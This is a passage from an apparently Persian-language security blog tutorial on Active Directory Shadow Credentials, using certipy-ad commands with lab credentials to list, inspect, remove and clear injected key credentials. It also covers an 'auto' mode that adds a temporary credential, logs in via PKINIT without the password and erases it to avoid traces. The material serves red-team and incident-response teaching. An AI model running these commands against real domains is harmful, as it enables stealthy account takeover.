\u062f\u0642\u06cc\u0642 \u062f\u0631 \u0645\u0648\u0631\u062f \u06cc\u06a9 Shadow Credential \u062e\u0627\u0635 \u06a9\u0647 \u0628\u0647 \u062d\u0633\u0627\u0628 shivam \u0645\u062a\u0635\u0644 \u0627\u0633\u062a\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f. \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u062c\u0632\u0626\u06cc\u0627\u062a\u06cc \u0645\u0627\u0646\u0646\u062f:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0634\u0646\u0627\u0633\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 (Device ID)<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0635\u0627\u062f\u0631\u06a9\u0646\u0646\u062f\u0647 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (Issuer)<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062a\u0627\u0631\u06cc\u062e \u0648 \u0632\u0645\u0627\u0646 \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0646 \u06a9\u0644\u06cc\u062f<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0631\u0627 \u0646\u0645\u0627\u06cc\u0634 \u0645\u06cc\u200c\u062f\u0647\u062f:<\/span><\/li>\n<\/ul>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b info<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0647 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u06a9\u0646\u062a\u0631\u0644 \u062f\u0642\u06cc\u0642\u06cc \u0628\u0631 \u06a9\u0644\u06cc\u062f\u0647\u0627\u06cc \u0645\u062e\u0641\u06cc\u200c\u0634\u062f\u0647 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f\u060c \u0648 \u0628\u0647 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u063a\u06cc\u0631\u0645\u062c\u0627\u0632 \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u062a\u062d\u0644\u06cc\u0644 \u06a9\u0646\u0646\u062f\u2014\u0628\u0647\u200c\u0648\u06cc\u0698\u0647 \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 PKINIT \u0648 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647\u200c\u0647\u0627\u06cc \u062c\u0639\u0644\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a \u0648 \u0628\u06cc\u200c\u0635\u062f\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19891\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-300x150.png\" alt=\"\" width=\"506\" height=\"253\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-300x150.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-1024x513.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-768x385.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-1536x769.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12-150x75.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/12.png 1649w\" sizes=\"(max-width: 506px) 100vw, 506px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647: \u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0646\u0634\u0627\u0646 \u062f\u0647\u062f \u06a9\u0647 \u0622\u06cc\u0627 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647 (Credential) \u0628\u0647\u200c\u062a\u0627\u0632\u06af\u06cc \u062a\u0632\u0631\u06cc\u0642 \u0634\u062f\u0647\u060c \u0628\u0627 \u0686\u0647 \u0631\u0648\u0634\u06cc \u0627\u0636\u0627\u0641\u0647 \u0634\u062f\u0647\u060c \u0648 \u062a\u0648\u0633\u0637 \u0686\u0647 \u0645\u0647\u0627\u062c\u0645\u06cc \u0648\u0627\u0631\u062f \u0634\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0631\u0627\u06cc \u062f\u0631\u06a9 \u0627\u0644\u06af\u0648\u0647\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0648 \u0633\u0627\u062e\u062a \u062e\u0637 \u0632\u0645\u0627\u0646\u06cc \u0648\u0642\u0627\u06cc\u0639 \u0627\u0645\u0646\u06cc\u062a\u06cc (Forensic Timeline) \u062f\u0631 \u062d\u06cc\u0646 \u067e\u0627\u0633\u062e \u0628\u0647 \u062d\u0627\u062f\u062b\u0647 (Incident Response) \u062d\u06cc\u0627\u062a\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062d\u0630\u0641 \u06cc\u06a9<\/strong><strong> Shadow Credential<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0628\u062e\u0648\u0627\u0647\u06cc\u0645 \u06cc\u06a9 Shadow Credential \u062e\u0627\u0635 \u0631\u0627 \u0627\u0632 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc shivam \u062d\u0630\u0641 \u06a9\u0646\u06cc\u0645 (\u0628\u0631\u0627\u06cc \u0645\u062b\u0627\u0644\u060c \u062c\u0647\u062a \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u067e\u0633 \u0627\u0632 \u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u06cc\u0627 \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u0645\u0647\u0627\u062c\u0645)\u060c \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b clear<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06a9\u0644\u06cc\u062f \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u062a\u0632\u0631\u06cc\u0642\u200c\u0634\u062f\u0647 \u062f\u0631 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 \u0631\u0627 \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f \u0628\u062e\u0634\u06cc \u0627\u0632 \u0639\u0645\u0644\u06cc\u0627\u062a \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc (Cleanup) \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc Red Team \u06cc\u0627 \u067e\u0627\u0633\u062e \u0628\u0647 \u0646\u0641\u0648\u0630 \u0648\u0627\u0642\u0639\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0623\u06cc\u06cc\u062f \u062d\u0630\u0641<\/strong><strong> Credential<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u0627\u06cc\u0646\u200c\u06a9\u0647 \u06a9\u0644\u06cc\u062f \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u062d\u0630\u0641 \u0634\u062f\u0647 \u0648 \u0647\u06cc\u0686 Shadow Credential \u062f\u06cc\u06af\u0631\u06cc \u0628\u0627 \u0647\u0645\u0627\u0646 \u0634\u0646\u0627\u0633\u0647 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f\u060c \u0645\u062c\u062f\u062f\u0627\u064b \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id 528c42e7-1395-e86c-4b06-fffd9758fe6b info<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0635\u0648\u0631\u062a \u0645\u0648\u0641\u0642\u06cc\u062a\u060c \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u0627 \u0647\u06cc\u0686 \u062e\u0631\u0648\u062c\u06cc \u0646\u0645\u0627\u06cc\u0634 \u0646\u0645\u06cc\u200c\u062f\u0647\u062f \u06cc\u0627 \u067e\u06cc\u0627\u0645 \u0639\u062f\u0645 \u0648\u062c\u0648\u062f \u06a9\u0644\u06cc\u062f (Not Found) \u0631\u0627 \u0646\u0634\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0627\u06cc\u0646 \u062a\u0623\u06cc\u06cc\u062f\u06cc\u0647 \u0628\u0631\u0627\u06cc \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u0627\u0632 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u06a9\u0627\u0645\u0644 \u0648 \u062d\u0630\u0641 \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0627\u0632 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0645\u0648\u0631\u062f\u0646\u0638\u0631 \u0636\u0631\u0648\u0631\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0627\u0647\u0645\u06cc\u062a \u0645\u062f\u06cc\u0631\u06cc\u062a \u062f\u0642\u06cc\u0642 Shadow Credential\u0647\u0627 \u062f\u0631 \u0647\u0631 \u062f\u0648 \u0641\u0627\u0632 Post-Exploitation \u0648 Incident Response \u0627\u0633\u062a\u060c \u0648 \u0628\u062e\u0634\u06cc \u062c\u062f\u0627\u0646\u0634\u062f\u0646\u06cc \u0627\u0632 \u062a\u062d\u0644\u06cc\u0644 \u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 AD CS \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19892\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-300x62.png\" alt=\"\" width=\"581\" height=\"120\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-300x62.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-1024x211.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-768x158.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-1536x316.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13-150x31.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/13.png 1670w\" sizes=\"(max-width: 581px) 100vw, 581px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0646\u06a9\u062a\u0647:<\/span><br \/>\n<span style=\"font-size: 10pt\">Shadow Credential\u0647\u0627 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u062f\u0631 \u0645\u0631\u062d\u0644\u0647 \u067e\u0633 \u0627\u0632 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (Post-Exploitation) \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u0645\u06cc\u200c\u06af\u06cc\u0631\u0646\u062f \u062a\u0627 \u0645\u0647\u0627\u062c\u0645 \u0628\u062a\u0648\u0627\u0646\u062f \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0627\u0646\u0633\u062a\u0646 \u06cc\u0627 \u0631\u06cc\u0633\u062a \u06a9\u0631\u062f\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631\u060c \u06cc\u0627 \u0628\u062f\u0648\u0646 \u0627\u0628\u0637\u0627\u0644 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0686\u0646\u062f\u0645\u0631\u062d\u0644\u0647\u200c\u0627\u06cc (MFA)\u060c \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u062f\u0633\u062a\u0631\u0633\u06cc \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u062a\u0646\u0647\u0627 \u0631\u0627\u0647 \u0648\u0627\u0642\u0639\u06cc \u0628\u0631\u0627\u06cc \u0644\u063a\u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0647\u0627\u062c\u0645\u060c \u062d\u0630\u0641 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0627\u06cc\u0646 Credential\u0647\u0627 \u0627\u0633\u062a\u060c \u0648 \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0627\u0647\u0645\u06cc\u062a \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0648 \u0645\u0642\u0627\u0628\u0644\u0647 \u0628\u0627 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0631\u0627\u06cc \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc \u062f\u0648\u0686\u0646\u062f\u0627\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0631\u0631\u0633\u06cc \u0648 \u062d\u0630\u0641<\/strong><strong> Shadow Credential<\/strong><strong>\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 \u062f\u0631 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u0628\u062a\u062f\u0627\u060c \u0628\u0631\u0631\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0647\u06cc\u0686 \u0634\u0646\u0627\u0633\u0647 \u062f\u0633\u062a\u06af\u0627\u0647 (Device ID) \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631\u06cc shivam \u0645\u062a\u0635\u0644 \u0627\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631. \u0627\u06af\u0631 \u0648\u062c\u0648\u062f \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u062f\u060c \u0628\u0627 \u062f\u0633\u062a\u0648\u0631 \u0628\u0639\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0622\u0646 \u0631\u0627 \u062d\u0630\u0641 \u06a9\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u06af\u0627\u0645 \u0627\u0648\u0644: \u0641\u0647\u0631\u0633\u062a<\/strong><strong> Device ID<\/strong><strong>\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631 <\/strong><strong>msDS-KeyCredentialLink<\/strong><\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam list<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u06af\u0627\u0645 \u062f\u0648\u0645: \u062d\u0630\u0641 \u0634\u0646\u0627\u0633\u0647 \u062e\u0627\u0635 \u0627\u0632 \u062d\u0633\u0627\u0628<\/strong><strong> shivam<\/strong><\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam -device-id d867fd89-9bf7-6831-fc13-adf40d60b014 remove<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c Shadow Credential \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 \u0631\u0627 \u0627\u0632 \u0648\u06cc\u0698\u06af\u06cc msDS-KeyCredentialLink \u062d\u0630\u0641 \u0645\u06cc\u200c\u06a9\u0646\u062f\u060c \u06a9\u0647 \u0628\u0647 \u0645\u0639\u0646\u06cc \u062d\u0630\u0641 \u06a9\u0627\u0645\u0644 \u062a\u0648\u0627\u0646\u0627\u06cc\u06cc \u0644\u0627\u06af\u06cc\u0646 \u0628\u062f\u0648\u0646 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u0628\u0647 \u062d\u0633\u0627\u0628 \u06a9\u0627\u0631\u0628\u0631 shivam \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0623\u06cc\u06cc\u062f \u062d\u0630\u0641 \u0645\u0648\u0641\u0642<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06af\u0631 \u062f\u0633\u062a\u0648\u0631 \u0628\u0627 \u0645\u0648\u0641\u0642\u06cc\u062a \u0627\u062c\u0631\u0627 \u0634\u0648\u062f\u060c \u0628\u0647\u200c\u0645\u0639\u0646\u0627\u06cc \u062d\u0630\u0641 \u0646\u0647\u0627\u06cc\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0647\u0627\u062c\u0645 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0627\u06cc\u0646 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645 \u0627\u0633\u062a \u0648 \u0627\u0637\u0645\u06cc\u0646\u0627\u0646 \u062d\u0627\u0635\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u062f\u06cc\u06af\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0646\u0627\u0645\u0647 (Certificate-based Auth) \u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062d\u0633\u0627\u0628 \u0648\u062c\u0648\u062f \u0646\u062f\u0627\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u062c\u0632\u0626\u06cc \u06a9\u0644\u06cc\u062f\u06cc \u062f\u0631 \u067e\u0627\u06a9\u200c\u0633\u0627\u0632\u06cc \u0648 \u0627\u062d\u06cc\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u0633 \u0627\u0632 \u0646\u0641\u0648\u0630 \u0627\u0633\u062a \u0648 \u0628\u0627\u06cc\u062f \u062f\u0631 \u0686\u06a9\u200c\u0644\u06cc\u0633\u062a\u200c\u0647\u0627\u06cc Incident Response \u0648 \u062a\u062d\u0644\u06cc\u0644\u200c\u0647\u0627\u06cc Forensics \u06af\u0646\u062c\u0627\u0646\u062f\u0647 \u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19893\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-300x77.png\" alt=\"\" width=\"534\" height=\"137\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-300x77.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-1024x264.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-768x198.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-1536x397.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14-150x39.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/14.png 1658w\" sizes=\"(max-width: 534px) 100vw, 534px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u062c\u0631\u0627\u06cc \u062e\u0648\u062f\u06a9\u0627\u0631: \u0627\u0641\u0632\u0648\u062f\u0646 <\/strong><strong>\u2192<\/strong><strong> \u0627\u0633\u062a\u0641\u0627\u062f\u0647 <\/strong><strong>\u2192<\/strong><strong> \u062d\u0630\u0641 (\u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0645\u0648\u0642\u062a\u06cc)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0627\u0632 \u06cc\u06a9 \u0642\u0627\u0628\u0644\u06cc\u062a \u067e\u06cc\u0634\u0631\u0641\u062a\u0647\u200c\u06cc \u0627\u0628\u0632\u0627\u0631 Certipy \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062f\u0631 \u06cc\u06a9 \u062f\u0633\u062a\u0648\u0631 \u0648\u0627\u062d\u062f:<\/span><\/p>\n<ol>\n<li><span style=\"font-size: 10pt\">\u06cc\u06a9 Shadow Credential \u0645\u0648\u0642\u062a \u0628\u0647 \u062d\u0633\u0627\u0628 \u0647\u062f\u0641 \u0627\u0636\u0627\u0641\u0647 \u06a9\u0646\u062f\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0628\u0644\u0627\u0641\u0627\u0635\u0644\u0647 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0622\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u062f (\u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631)\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0633\u067e\u0633 \u0641\u0648\u0631\u0627\u064b \u0622\u0646 Credential \u0631\u0627 \u067e\u0627\u06a9 \u06a9\u0646\u062f\u060c \u0637\u0648\u0631\u06cc \u06a9\u0647 \u0647\u06cc\u0686 \u0631\u062f\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0642\u06cc \u0646\u0645\u0627\u0646\u062f.<\/span><\/li>\n<\/ol>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad shadow -u raj -p Password@1 -dc-ip 192.168.1.20 -account shivam auto<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u0634\u0631\u062d \u0639\u0645\u0644\u06a9\u0631\u062f<\/strong><strong>:<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0627\u0641\u0632\u0648\u062f\u0646 (Add): \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u0645\u0648\u0642\u062a\u06cc \u0628\u0647 msDS-KeyCredentialLink \u06a9\u0627\u0631\u0628\u0631 shivam \u062a\u0632\u0631\u06cc\u0642 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0627\u0633\u062a\u0641\u0627\u062f\u0647 (Use): \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 PKINIT (\u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u0628\u0631 \u0627\u0633\u0627\u0633 \u06af\u0648\u0627\u0647\u06cc) \u0628\u0647 \u062f\u0627\u0645\u0646\u0647 \u0644\u0627\u06af\u06cc\u0646 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062d\u0630\u0641 (Remove): \u06a9\u0644\u06cc\u062f \u0628\u0644\u0627\u0641\u0627\u0635\u0644\u0647 \u067e\u0633 \u0627\u0632 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a \u067e\u0627\u06a9 \u0645\u06cc\u200c\u0634\u0648\u062f \u062a\u0627 \u0647\u06cc\u0686 \u0627\u062b\u0631\u06cc \u0627\u0632 \u0622\u0646 \u0628\u0627\u0642\u06cc \u0646\u0645\u0627\u0646\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9\u060c \u0633\u0637\u062d \u0628\u0627\u0644\u0627\u06cc\u06cc \u0627\u0632 \u067e\u0646\u0647\u0627\u0646\u200c\u06a9\u0627\u0631\u06cc (Stealth) \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f \u0648 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062a\u0648\u0633\u0637 \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0648\u0642\u062a\u06cc\u060c \u0628\u062f\u0648\u0646 \u0627\u06cc\u062c\u0627\u062f \u062a\u063a\u06cc\u06cc\u0631 \u067e\u0627\u06cc\u062f\u0627\u0631 \u062f\u0631 \u0633\u06cc\u0633\u062a\u0645 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u062f\u0641\u0627\u0639\u06cc\u060c \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0686\u0646\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a\u06cc \u0646\u06cc\u0627\u0632\u0645\u0646\u062f \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u067e\u06cc\u0634\u0631\u0641\u062a\u0647 \u0631\u0648\u06cc \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a msDS-KeyCredentialLink \u062f\u0631 \u0628\u0627\u0632\u0647\u200c\u0647\u0627\u06cc \u0632\u0645\u0627\u0646\u06cc \u06a9\u0648\u062a\u0627\u0647 \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u06cc\u06a9 \u0645\u062b\u0627\u0644 \u0648\u0627\u0642\u0639\u06cc \u0627\u0632 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0631 \u0633\u0637\u062d APT 